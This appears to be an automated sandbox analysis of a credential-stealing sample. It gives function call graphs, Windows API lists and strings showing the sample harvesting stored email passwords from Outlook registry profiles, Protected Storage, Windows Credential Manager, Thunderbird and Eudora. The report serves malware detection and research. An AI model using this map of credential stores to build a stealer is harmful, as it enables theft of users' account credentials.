33651 4047a3 33650->33651 33652 404799 FreeLibrary 33650->33652 33651->33509 33652->33651 33654 4107f1 FreeLibrary 33653->33654 33655 403c30 LoadLibraryA 33654->33655 33656 403c74 33655->33656 33657 403c44 GetProcAddress 33655->33657 33658 4107f1 FreeLibrary 33656->33658 33657->33656 33659 403c5e 33657->33659 33660 403c7b 33658->33660 33659->33656 33662 403c6b 33659->33662 33661 404734 3 API calls 33660->33661 33663 403c86 33661->33663 33662->33660 33741 4036e5 33663->33741 33666 4036e5 26 API calls 33667 403c9a 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403ca4 33668->33669 33670 4036e5 26 API calls 33669->33670 33671 403cae 33670->33671 33753 4085d2 33671->33753 33679 403ce5 33680 403cf7 33679->33680 33934 402bd1 39 API calls 33679->33934 33799 410a9c RegOpenKeyExA 33680->33799 33683 403d0a 33684 403d1c 33683->33684 33935 402bd1 39 API calls 33683->33935 33800 402c5d 33684->33800 33688 4070ae GetVersionExA 33689 403d31 33688->33689 33818 410a9c RegOpenKeyExA 33689->33818 33691 403d51 33692 403d61 33691->33692 33936 402b22 46 API calls 33691->33936 33819 410a9c RegOpenKeyExA 33692->33819 33695 403d87 33696 403d97 33695->33696 33937 402b22 46 API calls 33695->33937 33820 410a9c RegOpenKeyExA 33696->33820 33699 403dbd 33700 403dcd 33699->33700 33938 402b22 46 API calls 33699->33938 33821 410808 33700->33821 33704 404785 FreeLibrary 33705 403de8 33704->33705 33825 402fdb 33705->33825 33708 402fdb 34 API calls 33709 403e00 33708->33709 33841 4032b7 33709->33841 33718 403e3b 33720 403e73 33718->33720 33721 403e46 _mbscpy 33718->33721 33888 40fb00 33720->33888 33940 40f334 334 API calls 33721->33940 33730 410807 33729->33730 33731 4107fc FreeLibrary 33729->33731 33730->33509 33731->33730 33733 404785 FreeLibrary 33732->33733 33734 40473b LoadLibraryA 33733->33734 33735 40474c GetProcAddress 33734->33735 33738 40476e 33734->33738 33736 404764 33735->33736 33735->33738 33736->33738 33737 404781 33737->33509 33738->33737 33739 404785 FreeLibrary 33738->33739 
33739->33737 33740->33511 33742 4037c5 33741->33742 33743 4036fb 33741->33743 33742->33666 33941 410863 UuidFromStringA UuidFromStringA memcpy 33743->33941 33745 40370e 33745->33742 33746 403716 strchr 33745->33746 33746->33742 33747 403730 33746->33747 33942 4021b6 memset 33747->33942 33749 40373f _mbscpy _mbscpy strlen 33750 4037a4 _mbscpy 33749->33750 33751 403789 sprintf 33749->33751 33943 4023e5 16 API calls 33750->33943 33751->33750 33754 4085e2 33753->33754 33944 4082cd 11 API calls 33754->33944 33758 408600 33759 403cba 33758->33759 33760 40860b memset 33758->33760 33771 40821d 33759->33771 33947 410b62 RegEnumKeyExA 33760->33947 33762 4086d2 RegCloseKey 33762->33759 33764 408637 33764->33762 33765 40865c memset 33764->33765 33948 410a9c RegOpenKeyExA 33764->33948 33951 410b62 RegEnumKeyExA 33764->33951 33949 410add RegQueryValueExA 33765->33949 33768 408694 33950 40848b 10 API calls 33768->33950 33770 4086ab RegCloseKey 33770->33764 33952 410a9c RegOpenKeyExA 33771->33952 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33953 410b62 RegEnumKeyExA 33775->33953 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33954 410a9c RegOpenKeyExA 33779->33954 33955 4080ed 11 API calls 33779->33955 33956 410b62 RegEnumKeyExA 33779->33956 33782 4082a2 RegCloseKey 33782->33779 33957 4045db 33783->33957 33785 4088ef 33965 404656 33785->33965 33789 408737 wcslen 33789->33785 33795 40876a 33789->33795 33790 40877a _wcsncoll 33790->33795 33792 404734 3 API calls 33792->33795 33793 404785 FreeLibrary 33793->33795 33794 408812 memset 33794->33795 33796 40883c memcpy wcschr 33794->33796 33795->33785 33795->33790 33795->33792 33795->33793 33795->33794 33795->33796 33797 4088c3 LocalFree 33795->33797 33968 40466b _mbscpy 33795->33968 33796->33795 33797->33795 33798 410a9c RegOpenKeyExA 33798->33679 33799->33683 33969 410a9c RegOpenKeyExA 33800->33969 33802 402c7a 33803 402da5 33802->33803 33804 402c87 memset 
33802->33804 33803->33688 33970 410b62 RegEnumKeyExA 33804->33970 33806 402d9c RegCloseKey 33806->33803 33807 402cb2 33807->33806 33808 410b1e 3 API calls 33807->33808 33817 402d9a 33807->33817 33974 402bd1 39 API calls 33807->33974 33975 410b62 RegEnumKeyExA 33807->33975 33809 402ce4 memset sprintf 33808->33809 33971 410a9c RegOpenKeyExA 33809->33971 33811 402d28 33812 402d3a sprintf 33811->33812 33972 402bd1 39 API calls 33811->33972 33973 410a9c RegOpenKeyExA 33812->33973 33817->33806 33818->33691 33819->33695 33820->33699 33822 410816 33821->33822 33823 4107f1 FreeLibrary 33822->33823 33824 403ddd 33823->33824 33824->33704 33976 410a9c RegOpenKeyExA 33825->33976 33827 402ff9 33828 403006 memset 33827->33828 33829 40312c 33827->33829 33977 410b62 RegEnumKeyExA 33828->33977 33829->33708 33831 403122 RegCloseKey 33831->33829 33832 410b1e 3 API calls 33833 403058 memset sprintf 33832->33833 33978 410a9c RegOpenKeyExA 33833->33978 33835 4030a2 memset 33979 410b62 RegEnumKeyExA 33835->33979 33836 410b62 RegEnumKeyExA 33840 403033 33836->33840 33838 4030f9 RegCloseKey 33838->33840 33840->33831 33840->33832 33840->33835 33840->33836 33840->33838 33980 402db3 26 API calls 33840->33980 33842 4032d5 33841->33842 33843 4033a9 33841->33843 33981 4021b6 memset 33842->33981 33856 4034e4 memset memset 33843->33856 33845 4032e1 33982 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33845->33982 33847 4032ea 33848 4032f8 memset GetPrivateProfileSectionA 33847->33848 33983 4023e5 16 API calls 33847->33983 33848->33843 33853 40332f 33848->33853 33850 40339b strlen 33850->33843 33850->33853 33852 403350 strchr 33852->33853 33853->33843 33853->33850 33984 4021b6 memset 33853->33984 33985 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33853->33985 33986 4023e5 16 API calls 33853->33986 33857 410b1e 3 API calls 33856->33857 33858 40353f 33857->33858 33859 40357f 33858->33859 33860 403546 _mbscpy 33858->33860 33864 403985 33859->33864 33987 406d55 strlen _mbscat 
33860->33987 33862 403565 _mbscat 33988 4033f0 19 API calls 33862->33988 33989 40466b _mbscpy 33864->33989 33868 4039aa 33870 4039ff 33868->33870 33990 40f460 memset memset 33868->33990 34011 40f6e2 33868->34011 34029 4038e8 21 API calls 33868->34029 33871 404785 FreeLibrary 33870->33871 33872 403a0b 33871->33872 33873 4037ca memset memset 33872->33873 34037 444551 memset 33873->34037 33875 4038e2 33875->33718 33939 40f334 334 API calls 33875->33939 33878 40382e 33879 406f06 2 API calls 33878->33879 33880 403843 33879->33880 33881 406f06 2 API calls 33880->33881 33882 403855 strchr 33881->33882 33883 403884 _mbscpy 33882->33883 33884 403897 strlen 33882->33884 33885 4038bf _mbscpy 33883->33885 33884->33885 33886 4038a4 sprintf 33884->33886 34049 4023e5 16 API calls 33885->34049 33886->33885 33889 44b090 33888->33889 33890 40fb10 RegOpenKeyExA 33889->33890 33891 403e7f 33890->33891 33892 40fb3b RegOpenKeyExA 33890->33892 33902 40f96c 33891->33902 33893 40fb55 RegQueryValueExA 33892->33893 33894 40fc2d RegCloseKey 33892->33894 33895 40fc23 RegCloseKey 33893->33895 33896 40fb84 33893->33896 33894->33891 33895->33894 33897 404734 3 API calls 33896->33897 33898 40fb91 33897->33898 33898->33895 33899 40fc19 LocalFree 33898->33899 33900 40fbdd memcpy memcpy 33898->33900 33899->33895 34054 40f802 11 API calls 33900->34054 33903 4070ae GetVersionExA 33902->33903 33904 40f98d 33903->33904 33905 4045db 7 API calls 33904->33905 33913 40f9a9 33905->33913 33906 40fae6 33907 404656 FreeLibrary 33906->33907 33908 403e85 33907->33908 33914 4442ea memset 33908->33914 33909 40fa13 memset WideCharToMultiByte 33910 40fa43 _strnicmp 33909->33910 33909->33913 33911 40fa5b WideCharToMultiByte 33910->33911 33910->33913 33912 40fa88 WideCharToMultiByte 33911->33912 33911->33913 33912->33913 33913->33906 33913->33909 33915 410dbb 9 API calls 33914->33915 33916 444329 33915->33916 34055 40759e strlen strlen 33916->34055 33921 410dbb 9 API calls 33922 444350 33921->33922 33923 40759e 3 API 
calls 33922->33923 33924 44435a 33923->33924 33925 444212 65 API calls 33924->33925 33926 444366 memset memset 33925->33926 33927 410b1e 3 API calls 33926->33927 33928 4443b9 ExpandEnvironmentStringsA strlen 33927->33928 33929 4443f4 _strcmpi 33928->33929 33930 4443e5 33928->33930 33931 403e91 33929->33931 33932 44440c 33929->33932 33930->33929 33931->33509 33933 444212 65 API calls 33932->33933 33933->33931 33934->33680 33935->33684 33936->33692 33937->33696 33938->33700 33939->33718 33940->33720 33941->33745 33942->33749 33943->33742 33945 40841c 33944->33945 33946 410a9c RegOpenKeyExA 33945->33946 33946->33758 33947->33764 33948->33764 33949->33768 33950->33770 33951->33764 33952->33773 33953->33779 33954->33779 33955->33782 33956->33779 33958 404656 FreeLibrary 33957->33958 33959 4045e3 LoadLibraryA 33958->33959 33960 404651 33959->33960 33961 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33959->33961 33960->33785 33960->33789 33962 40463d 33961->33962 33963 404643 33962->33963 33964 404656 FreeLibrary 33962->33964 33963->33960 33964->33960 33966 403cd2 33965->33966 33967 40465c FreeLibrary 33965->33967 33966->33798 33967->33966 33968->33795 33969->33802 33970->33807 33971->33811 33972->33812 33973->33807 33974->33807 33975->33807 33976->33827 33977->33840 33978->33840 33979->33840 33980->33840 33981->33845 33982->33847 33983->33848 33984->33852 33985->33853 33986->33853 33987->33862 33988->33859 33989->33868 34030 4078ba 33990->34030 33993 4078ba _mbsnbcat 33994 40f5a3 RegOpenKeyExA 33993->33994 33995 40f5c3 RegQueryValueExA 33994->33995 33996 40f6d9 33994->33996 33997 40f6d0 RegCloseKey 33995->33997 33998 40f5f0 33995->33998 33996->33868 33997->33996 33998->33997 33999 40f675 33998->33999 34034 40466b _mbscpy 33998->34034 33999->33997 34035 4012ee strlen 33999->34035 34001 40f611 34003 404734 3 API calls 34001->34003 34008 40f616 34003->34008 34004 40f69e RegQueryValueExA 34004->33997 34005 40f6c1 34004->34005 34005->33997 
34006 40f66a 34007 404785 FreeLibrary 34006->34007 34007->33999 34008->34006 34009 40f661 LocalFree 34008->34009 34010 40f645 memcpy 34008->34010 34009->34006 34010->34009 34036 40466b _mbscpy 34011->34036 34013 40f6fa 34014 4045db 7 API calls 34013->34014 34015 40f708 34014->34015 34016 404734 3 API calls 34015->34016 34023 40f7e2 34015->34023 34018 40f715 34016->34018 34017 404656 FreeLibrary 34019 40f7f1 34017->34019 34020 40f71d CredReadA 34018->34020 34018->34023 34021 404785 FreeLibrary 34019->34021 34020->34023 34024 40f734 34020->34024 34022 40f7fc 34021->34022 34022->33868 34023->34017 34024->34023 34025 40f797 WideCharToMultiByte 34024->34025 34026 40f7b8 strlen 34025->34026 34027 40f7d9 LocalFree 34025->34027 34026->34027 34028 40f7c8 _mbscpy 34026->34028 34027->34023 34028->34027 34029->33868 34031 4078e6 34030->34031 34032 4078c7 _mbsnbcat 34031->34032 34033 4078ea 34031->34033 34032->34031 34033->33993 34034->34001 34035->34004 34036->34013 34050 410a9c RegOpenKeyExA 34037->34050 34039 44458b 34040 40381a 34039->34040 34051 410add RegQueryValueExA 34039->34051 34040->33875 34048 4021b6 memset 34040->34048 34042 4445a4 34043 4445dc RegCloseKey 34042->34043 34052 410add RegQueryValueExA 34042->34052 34043->34040 34045 4445c1 34045->34043 34053 444879 30 API calls 34045->34053 34047 4445da 34047->34043 34048->33878 34049->33875 34050->34039 34051->34042 34052->34045 34053->34047 34054->33899 34056 4075c9 34055->34056 34057 4075bb _mbscat 34055->34057 34058 444212 34056->34058 34057->34056 34075 407e9d 34058->34075 34061 44424d 34062 444274 34061->34062 34063 444258 34061->34063 34083 407ef8 34061->34083 34064 407e9d 9 API calls 34062->34064 34100 444196 52 API calls 34063->34100 34071 4442a0 34064->34071 34066 407ef8 9 API calls 34066->34071 34067 4442ce 34097 407f90 34067->34097 34071->34066 34071->34067 34073 444212 65 API calls 34071->34073 34093 407e62 34071->34093 34072 407f90 FindClose 34074 4442e4 34072->34074 34073->34071 34074->33921 34076 
407f90 FindClose 34075->34076 34077 407eaa 34076->34077 34078 406f06 2 API calls 34077->34078 34079 407ebd strlen strlen 34078->34079 34080 407ee1 34079->34080 34081 407eea 34079->34081 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34080->34101 34081->34061 34084 407f03 FindFirstFileA 34083->34084 34085 407f24 FindNextFileA 34083->34085 34086 407f3f 34084->34086 34087 407f46 strlen strlen 34085->34087 34088 407f3a 34085->34088 34086->34087 34090 407f7f 34086->34090 34087->34090 34091 407f76 34087->34091 34089 407f90 FindClose 34088->34089 34089->34086 34090->34061 34102 4070e3 strlen _mbscat _mbscpy _mbscat 34091->34102 34094 407e6c strcmp 34093->34094 34096 407e94 34093->34096 34095 407e83 strcmp 34094->34095 34094->34096 34095->34096 34096->34071 34098 407fa3 34097->34098 34099 407f99 FindClose 34097->34099 34098->34072 34099->34098 34100->34061 34101->34081 34102->34090 34103->33523 34104->33527 34105->33533 34106->33535 34107->33540 34108->33537 34109->33532 34118 411853 RtlInitializeCriticalSection memset 34119 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34292 40a256 13 API calls 34294 432e5b 17 API calls 34296 43fa5a 20 API calls 34121 401060 41 API calls 34299 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34301 405e69 14 API calls 34126 433068 15 API calls __fprintf_l 34303 414a6d 18 API calls 34304 43fe6f 134 API calls 34128 424c6d 15 API calls __fprintf_l 34305 426741 19 API calls 34130 440c70 17 API calls 34131 443c71 44 API calls 34134 427c79 24 API calls 34308 416e7e memset __fprintf_l 34138 42800b 47 API calls 34139 425115 85 API calls __fprintf_l 34311 41960c 61 API calls 34140 43f40c 122 API calls __fprintf_l 34143 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34144 43f81a 20 API calls 34146 414c20 memset 
memset 34147 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34315 414625 18 API calls 34316 404225 modf 34317 403a26 strlen WriteFile 34319 40422a 12 API calls 34323 427632 memset memset memcpy 34324 40ca30 59 API calls 34325 404235 26 API calls 34148 42ec34 61 API calls __fprintf_l 34149 425115 76 API calls __fprintf_l 34326 425115 77 API calls __fprintf_l 34328 44223a 38 API calls 34155 43183c 112 API calls 34329 44b2c5 _onexit __dllonexit 34334 42a6d2 memcpy __allrem 34157 405cda 65 API calls 34342 43fedc 138 API calls 34343 4116e1 16 API calls __fprintf_l 34160 4244e6 19 API calls 34162 42e8e8 127 API calls __fprintf_l 34163 4118ee RtlLeaveCriticalSection 34348 43f6ec 22 API calls 34165 425115 119 API calls __fprintf_l 33187 410cf3 EnumResourceNamesA 34351 4492f0 memcpy memcpy 34353 43fafa 18 API calls 34355 4342f9 15 API calls __fprintf_l 34166 4144fd 19 API calls 34357 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34358 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34361 443a84 _mbscpy 34363 43f681 17 API calls 34169 404487 22 API calls 34365 415e8c 16 API calls __fprintf_l 34173 411893 RtlDeleteCriticalSection __fprintf_l 34174 41a492 42 API calls 34369 403e96 34 API calls 34370 410e98 memset SHGetPathFromIDList SendMessageA 34176 426741 109 API calls __fprintf_l 34177 4344a2 18 API calls 34178 4094a2 10 API calls 34373 4116a6 15 API calls __fprintf_l 34374 43f6a4 17 API calls 34375 440aa3 20 API calls 34377 427430 45 API calls 34181 4090b0 7 API calls 34182 4148b0 15 API calls 34184 4118b4 RtlEnterCriticalSection 34185 4014b7 CreateWindowExA 34186 40c8b8 19 API calls 34188 4118bf RtlTryEnterCriticalSection 34382 42434a 18 API calls __fprintf_l 34384 405f53 12 API calls 34196 43f956 59 API calls 34198 40955a 17 API calls 34199 428561 36 API calls 34200 409164 7 API calls 34388 404366 19 API calls 34392 40176c ExitProcess 34395 410777 42 API calls 34205 40dd7b 51 API calls 34206 425d7c 16 API calls 
__fprintf_l 34397 43f6f0 25 API calls 34398 42db01 22 API calls 34207 412905 15 API calls __fprintf_l 34399 403b04 54 API calls 34400 405f04 SetDlgItemTextA GetDlgItemTextA 34401 44b301 ??3@YAXPAX 34404 4120ea 14 API calls 3 library calls 34405 40bb0a 8 API calls 34407 413f11 strcmp 34211 434110 17 API calls __fprintf_l 34214 425115 108 API calls __fprintf_l 34408 444b11 _onexit 34216 425115 76 API calls __fprintf_l 34219 429d19 10 API calls 34411 444b1f __dllonexit 34412 409f20 _strcmpi 34221 42b927 31 API calls 34415 433f26 19 API calls __fprintf_l 34416 44b323 FreeLibrary 34417 427f25 46 API calls 34418 43ff2b 17 API calls 34419 43fb30 19 API calls 34228 414d36 16 API calls 34230 40ad38 7 API calls 34421 433b38 16 API calls __fprintf_l 34422 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34234 426741 21 API calls 34235 40c5c3 125 API calls 34237 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34240 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33213 44b454 33210->33213 33216 44b42b 33210->33216 33212 44b41c 33212->33213 33214 44b435 VirtualProtect 33212->33214 33214->33213 33215 44b444 VirtualProtect 33214->33215 33215->33213 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34428 43ffc8 18 API calls 34241 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34242 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34243 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34245 4335ee 16 API calls __fprintf_l 34444 
429fef 11 API calls 34246 444deb _exit _c_exit 34445 40bbf0 138 API calls 34249 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34253 4021ff 14 API calls 34254 43f5fc 149 API calls 34450 40e381 9 API calls 34256 405983 40 API calls 34257 42b186 27 API calls __fprintf_l 34258 427d86 76 API calls 34259 403585 20 API calls 34261 42e58e 18 API calls __fprintf_l 34264 425115 75 API calls __fprintf_l 34266 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34454 434395 16 API calls 34268 441d9c memcmp 34456 43f79b 119 API calls 34269 40c599 43 API calls 34457 426741 87 API calls 34273 4401a6 21 API calls 34275 426da6 memcpy memset memset memcpy 34276 4335a5 15 API calls 34278 4299ab memset memset memcpy memset memset 34279 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33234 40765c 33232->33234 33233->33231 33235 4076a3 33234->33235 33238 40737c strtoul 33234->33238 33235->33231 33237->33230 33238->33234 34281 40b5bf memset memset _mbsicmp

Control-flow Graph

control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                • memcpy.MSVCRT ref: 0040840A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                • String ID: ACD
                                                                                                                • API String ID: 379999529-620537770
                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00401E8B
                                                                                                                • strlen.MSVCRT ref: 00401EA4
                                                                                                                • strlen.MSVCRT ref: 00401EB2
                                                                                                                • strlen.MSVCRT ref: 00401EF8
                                                                                                                • strlen.MSVCRT ref: 00401F06
                                                                                                                • memset.MSVCRT ref: 00401FB1
                                                                                                                • atoi.MSVCRT ref: 00401FE0
                                                                                                                • memset.MSVCRT ref: 00402003
                                                                                                                • sprintf.MSVCRT ref: 00402030
                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                • memset.MSVCRT ref: 00402086
                                                                                                                • memset.MSVCRT ref: 0040209B
                                                                                                                • strlen.MSVCRT ref: 004020A1
                                                                                                                • strlen.MSVCRT ref: 004020AF
                                                                                                                • strlen.MSVCRT ref: 004020E2
                                                                                                                • strlen.MSVCRT ref: 004020F0
                                                                                                                • memset.MSVCRT ref: 00402018
                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                • _mbscpy.MSVCRT ref: 00402177
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                  • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                • API String ID: 1846531875-4223776976
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                  • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                  • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                  • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                                                                                • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                • API String ID: 745651260-375988210
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                • _mbscpy.MSVCRT ref: 00403E54
                                                                                                                Strings
                                                                                                                • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                • pstorec.dll, xrefs: 00403C30
                                                                                                                • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.2625213620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                • API String ID: 1197458902-317895162
